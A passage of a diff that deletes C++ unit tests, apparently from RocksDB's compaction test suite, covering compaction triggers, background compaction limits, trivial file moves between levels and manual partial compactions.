-      ASSERT_GT(db_size[0] / 3, db_size[2]);
-    }
-  }
-}
-
-
-TEST_P(DBCompactionTestWithParam, CompactionTrigger) {
-  const int kNumKeysPerFile = 100;
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_subcompactions = max_subcompactions_;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    std::vector<std::string> values;
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < kNumKeysPerFile; i++) {
-      values.push_back(RandomString(&rnd, 990));
-      ASSERT_OK(Put(1, Key(i), values[i]));
-    }
-    // put extra key to trigger flush
-    ASSERT_OK(Put(1, "", ""));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), num + 1);
-  }
-
-  // generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < kNumKeysPerFile; i++) {
-    values.push_back(RandomString(&rnd, 990));
-    ASSERT_OK(Put(1, Key(i), values[i]));
-  }
-  // put extra key to trigger flush
-  ASSERT_OK(Put(1, "", ""));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 1);
-}
-
-TEST_F(DBCompactionTest, BGCompactionsAllowed) {
-  // Create several column families. Make compaction triggers in all of them
-  // and see number of compactions scheduled to be less than allowed.
-  const int kNumKeysPerFile = 100;
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 3;
-  // Should speed up compaction when there are 4 files.
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 20;
-  options.soft_pending_compaction_bytes_limit = 1 << 30;  // Infinitely large
-  options.max_background_compactions = 3;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-
-  // Block all threads in thread pool.
-  const size_t kTotalTasks = 4;
-  env_->SetBackgroundThreads(4, Env::LOW);
-  test::SleepingBackgroundTask sleeping_tasks[kTotalTasks];
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                   &sleeping_tasks[i], Env::Priority::LOW);
-    sleeping_tasks[i].WaitUntilSleeping();
-  }
-
-  CreateAndReopenWithCF({"one", "two", "three"}, options);
-
-  Random rnd(301);
-  for (int cf = 0; cf < 4; cf++) {
-    for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-      for (int i = 0; i < kNumKeysPerFile; i++) {
-        ASSERT_OK(Put(cf, Key(i), ""));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put(cf, "", ""));
-      dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-      ASSERT_EQ(NumTableFilesAtLevel(0, cf), num + 1);
-    }
-  }
-
-  // Now all column families qualify compaction but only one should be
-  // scheduled, because no column family hits speed up condition.
-  ASSERT_EQ(1, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  // Create two more files for one column family, which triggers speed up
-  // condition, three compactions will be scheduled.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-    for (int i = 0; i < kNumKeysPerFile; i++) {
-      ASSERT_OK(Put(2, Key(i), ""));
-    }
-    // put extra key to trigger flush
-    ASSERT_OK(Put(2, "", ""));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    ASSERT_EQ(options.level0_file_num_compaction_trigger + num + 1,
-              NumTableFilesAtLevel(0, 2));
-  }
-  ASSERT_EQ(3, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  // Unblock all threads to unblock all compactions.
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].WakeUp();
-    sleeping_tasks[i].WaitUntilDone();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify number of compactions allowed will come back to 1.
-
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].Reset();
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                   &sleeping_tasks[i], Env::Priority::LOW);
-    sleeping_tasks[i].WaitUntilSleeping();
-  }
-  for (int cf = 0; cf < 4; cf++) {
-    for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-      for (int i = 0; i < kNumKeysPerFile; i++) {
-        ASSERT_OK(Put(cf, Key(i), ""));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put(cf, "", ""));
-      dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-      ASSERT_EQ(NumTableFilesAtLevel(0, cf), num + 1);
-    }
-  }
-
-  // Now all column families qualify compaction but only one should be
-  // scheduled, because no column family hits speed up condition.
-  ASSERT_EQ(1, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].WakeUp();
-    sleeping_tasks[i].WaitUntilDone();
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, CompactionsGenerateMultipleFiles) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;        // Large write buffer
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-
-  // Write 8MB (80 values, each 100K)
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  std::vector<std::string> values;
-  for (int i = 0; i < 80; i++) {
-    values.push_back(RandomString(&rnd, 100000));
-    ASSERT_OK(Put(1, Key(i), values[i]));
-  }
-
-  // Reopening moves updates to level-0
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1],
-                              true /* disallow trivial move */);
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_GT(NumTableFilesAtLevel(1, 1), 1);
-  for (int i = 0; i < 80; i++) {
-    ASSERT_EQ(Get(1, Key(i)), values[i]);
-  }
-}
-
-TEST_F(DBCompactionTest, MinorCompactionsHappen) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 10000;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int N = 500;
-
-    int starting_num_tables = TotalTableFiles(1);
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i) + std::string(1000, 'v')));
-    }
-    int ending_num_tables = TotalTableFiles(1);
-    ASSERT_GT(ending_num_tables, starting_num_tables);
-
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i) + std::string(1000, 'v'), Get(1, Key(i)));
-    }
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i) + std::string(1000, 'v'), Get(1, Key(i)));
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, UserKeyCrossFile1) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  DestroyAndReopen(options);
-
-  // create first file and flush to l0
-  Put("4", "A");
-  Put("3", "A");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  Put("2", "A");
-  Delete("3");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  // move both files down to l1
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  for (int i = 0; i < 3; i++) {
-    Put("2", "B");
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-}
-
-TEST_F(DBCompactionTest, UserKeyCrossFile2) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  DestroyAndReopen(options);
-
-  // create first file and flush to l0
-  Put("4", "A");
-  Put("3", "A");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  Put("2", "A");
-  SingleDelete("3");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  // move both files down to l1
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  for (int i = 0; i < 3; i++) {
-    Put("2", "B");
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-}
-
-TEST_F(DBCompactionTest, ZeroSeqIdCompaction) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  // compaction options
-  CompactionOptions compact_opt;
-  compact_opt.compression = kNoCompression;
-  compact_opt.output_file_size_limit = 4096;
-  const size_t key_len =
-    static_cast<size_t>(compact_opt.output_file_size_limit) / 5;
-
-  DestroyAndReopen(options);
-
-  std::vector<const Snapshot*> snaps;
-
-  // create first file and flush to l0
-  for (auto& key : {"1", "2", "3", "3", "3", "3"}) {
-    Put(key, std::string(key_len, 'A'));
-    snaps.push_back(dbfull()->GetSnapshot());
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // create second file and flush to l0
-  for (auto& key : {"3", "4", "5", "6", "7", "8"}) {
-    Put(key, std::string(key_len, 'A'));
-    snaps.push_back(dbfull()->GetSnapshot());
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // move both files down to l1
-  dbfull()->CompactFiles(compact_opt, collector->GetFlushedFiles(), 1);
-
-  // release snap so that first instance of key(3) can have seqId=0
-  for (auto snap : snaps) {
-    dbfull()->ReleaseSnapshot(snap);
-  }
-
-  // create 3 files in l0 so to trigger compaction
-  for (int i = 0; i < options.level0_file_num_compaction_trigger; i++) {
-    Put("2", std::string(1, 'A'));
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_OK(Put("", ""));
-}
-
-TEST_F(DBCompactionTest, ManualCompactionUnknownOutputSize) {
-  // github issue #2249
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-
-  // create two files in l1 that we can compact
-  for (int i = 0; i < 2; ++i) {
-    for (int j = 0; j < options.level0_file_num_compaction_trigger; j++) {
-      // make l0 files' ranges overlap to avoid trivial move
-      Put(std::to_string(2 * i), std::string(1, 'A'));
-      Put(std::to_string(2 * i + 1), std::string(1, 'A'));
-      Flush();
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-    ASSERT_EQ(NumTableFilesAtLevel(1, 0), i + 1);
-  }
-
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(dbfull()->DefaultColumnFamily(), &cf_meta);
-  ASSERT_EQ(2, cf_meta.levels[1].files.size());
-  std::vector<std::string> input_filenames;
-  for (const auto& sst_file : cf_meta.levels[1].files) {
-    input_filenames.push_back(sst_file.name);
-  }
-
-  // note CompactionOptions::output_file_size_limit is unset.
-  CompactionOptions compact_opt;
-  compact_opt.compression = kNoCompression;
-  dbfull()->CompactFiles(compact_opt, input_filenames, 1);
-}
-
-// Check that writes done during a memtable compaction are recovered
-// if the database is shutdown during the memtable compaction.
-TEST_F(DBCompactionTest, RecoverDuringMemtableCompaction) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Trigger a long memtable compaction and reopen the database during it
-    ASSERT_OK(Put(1, "foo", "v1"));  // Goes to 1st log file
-    ASSERT_OK(Put(1, "big1", std::string(10000000, 'x')));  // Fills memtable
-    ASSERT_OK(Put(1, "big2", std::string(1000, 'y')));  // Triggers compaction
-    ASSERT_OK(Put(1, "bar", "v2"));                     // Goes to new log file
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ(std::string(10000000, 'x'), Get(1, "big1"));
-    ASSERT_EQ(std::string(1000, 'y'), Get(1, "big2"));
-  } while (ChangeOptions());
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) {
-  int32_t trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t num_keys = 80;
-  int32_t value_size = 100 * 1024;  // 100 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  for (int i = 0; i < num_keys; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-
-  // Reopening moves updates to L0
-  Reopen(options);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 1);  // 1 file in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // 0 files in L1
-
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  LiveFileMetaData level0_file = metadata[0];  // L0 file meta
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-
-  // Compaction will initiate a trivial move from L0 to L1
-  dbfull()->CompactRange(cro, nullptr, nullptr);
-
-  // File moved From L0 to L1
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);  // 0 files in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 1);  // 1 file in L1
-
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  ASSERT_EQ(metadata[0].name /* level1_file.name */, level0_file.name);
-  ASSERT_EQ(metadata[0].size /* level1_file.size */, level0_file.size);
-
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  ASSERT_EQ(trivial_move, 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  // non overlapping ranges
-  std::vector<std::pair<int32_t, int32_t>> ranges = {
-    {100, 199},
-    {300, 399},
-    {0, 99},
-    {200, 299},
-    {600, 699},
-    {400, 499},
-    {500, 550},
-    {551, 599},
-  };
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  int32_t level0_files = NumTableFilesAtLevel(0, 0);
-  ASSERT_EQ(level0_files, ranges.size());    // Multiple files in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // No files in L1
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-
-  // Since data is non-overlapping we expect compaction to initiate
-  // a trivial move
-  db_->CompactRange(cro, nullptr, nullptr);
-  // We expect that all the files were trivially moved from L0 to L1
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0) /* level1_files */, level0_files);
-
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      ASSERT_EQ(Get(Key(j)), values[j]);
-    }
-  }
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  trivial_move = 0;
-  non_trivial_move = 0;
-  values.clear();
-  DestroyAndReopen(options);
-  // Same ranges as above but overlapping
-  ranges = {
-    {100, 199},
-    {300, 399},
-    {0, 99},
-    {200, 299},
-    {600, 699},
-    {400, 499},
-    {500, 560},  // this range overlap with the next one
-    {551, 599},
-  };
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  db_->CompactRange(cro, nullptr, nullptr);
-
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      ASSERT_EQ(Get(Key(j)), values[j]);
-    }
-  }
-  ASSERT_EQ(trivial_move, 0);
-  ASSERT_EQ(non_trivial_move, 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.num_levels = 7;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 300]
-  for (int32_t i = 0; i <= 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [600 => 700]
-  for (int32_t i = 600; i <= 700; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 6;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L6
-  ASSERT_EQ("0,0,0,0,0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int32_t i = 0; i <= 300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-  for (int32_t i = 600; i <= 700; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  bool first = true;
-  // Purpose of dependencies:
-  // 4 -> 1: ensure the order of two non-trivial compactions
-  // 5 -> 2 and 5 -> 3: ensure we do a check before two non-trivial compactions
-  // are installed
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBCompaction::ManualPartial:4", "DBCompaction::ManualPartial:1"},
-       {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"},
-       {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (first) {
-          first = false;
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:4");
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:3");
-        } else {  // second non-trivial compaction
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:2");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.num_levels = 7;
-  options.max_subcompactions = max_subcompactions_;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-  options.target_file_size_base = 1 << 23;  // 8 MB
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 6;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  // Trivial move the two non-overlapping files to level 6
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L6
-  ASSERT_EQ("0,0,0,0,0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 1 files in L0
-  ASSERT_EQ("1,0,0,0,0,0,2", FilesPerLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(1, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(2, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(3, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(4, nullptr, nullptr, nullptr, false));
-  // 2 files in L6, 1 file in L5
-  ASSERT_EQ("0,0,0,0,0,1,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 6);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  rocksdb::port::Thread threads([&] {
-    compact_options.change_level = false;
-    compact_options.exclusive_manual_compaction = false;
-    std::string begin_string = Key(0);
-    std::string end_string = Key(199);
-    Slice begin(begin_string);
-    Slice end(end_string);
-    // First non-trivial compaction is triggered
-    ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  });
-
-  TEST_SYNC_POINT("DBCompaction::ManualPartial:1");
-  // file 4 [300 => 400)
-  for (int32_t i = 300; i <= 400; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 5 [400 => 500)
-  for (int32_t i = 400; i <= 500; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 6 [500 => 600)
-  for (int32_t i = 500; i <= 600; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  // Second non-trivial compaction is triggered
-  ASSERT_OK(Flush());
-
-  // Before two non-trivial compactions are installed, there are 3 files in L0
-  ASSERT_EQ("3,0,0,0,0,1,2", FilesPerLevel(0));
-  TEST_SYNC_POINT("DBCompaction::ManualPartial:5");
-
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  // After two non-trivial compactions are installed, there is 1 file in L6, and
-  // 1 file in L1
-  ASSERT_EQ("0,1,0,0,0,0,1", FilesPerLevel(0));
-  threads.join();
-
-  for (int32_t i = 0; i < 600; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-// Disable as the test is flaky.
-TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  bool first = true;
-  bool second = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"},
-       {"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (first) {
-          TEST_SYNC_POINT("DBCompaction::PartialFill:4");
-          first = false;
-          TEST_SYNC_POINT("DBCompaction::PartialFill:3");
-        } else if (second) {
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-
-  DestroyAndReopen(options);
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L2
-  ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L2, 1 in L0
-  ASSERT_EQ("1,0,2", FilesPerLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr, false));
-  // 2 files in L2, 1 in L1
-  ASSERT_EQ("0,1,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 2);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  rocksdb::port::Thread threads([&] {
-    compact_options.change_level = false;
-    compact_options.exclusive_manual_compaction = false;
-    std::string begin_string = Key(0);
-    std::string end_string = Key(199);
-    Slice begin(begin_string);
-    Slice end(end_string);
-    ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  });
-
-  TEST_SYNC_POINT("DBCompaction::PartialFill:1");
-  // Many files 4 [300 => 4300)
-  for (int32_t i = 0; i <= 5; i++) {
-    for (int32_t j = 300; j < 4300; j++) {
-      if (j == 2300) {
-        ASSERT_OK(Flush());
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-  }
-
-  // Verify level sizes
-  uint64_t target_size = 4 * options.max_bytes_for_level_base;
-  for (int32_t i = 1; i < options.num_levels; i++) {
